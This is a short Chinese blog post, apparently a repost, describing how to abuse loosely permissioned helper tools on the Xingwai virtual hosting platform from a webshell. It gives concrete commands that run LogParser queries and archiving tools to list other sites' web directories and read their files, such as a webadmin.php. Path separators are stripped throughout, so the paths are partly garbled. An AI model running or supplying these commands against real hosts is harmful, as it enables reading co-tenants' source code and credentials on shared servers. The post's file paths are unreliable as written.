星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:windows7i24IISLOG.exe
 
c:windows7i24IISLOG2.exe
 
c:windows7i24IISLOG3.exe
 
c:windows7i24IISLOG4.exe
 
c:windows7i24tool.exe
 
c:windowsrsb.exe

其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录:

webshell

CmdPath:
 
c:windows7i24IISLOG
 
Argument:
 
“select top 100 path from e:host*.*” -i:FS -rtp:-1

下面读取文件内容:

c:windows7i24IISLOG
 
“select text from e:host233abwebadmin.php” -i:textline -rtp:-1

7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:

CmdPath:
 
c:windows7i24IISLOG3
 
Argument:
 
e:host233abweb c:windowstemp123.rar

同样的还有rbs.exe

CmdPath:
 
c:windowsrbs -r -v 024dbjj
 
Argument:
 
e:host233abweb*.*

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/6259.html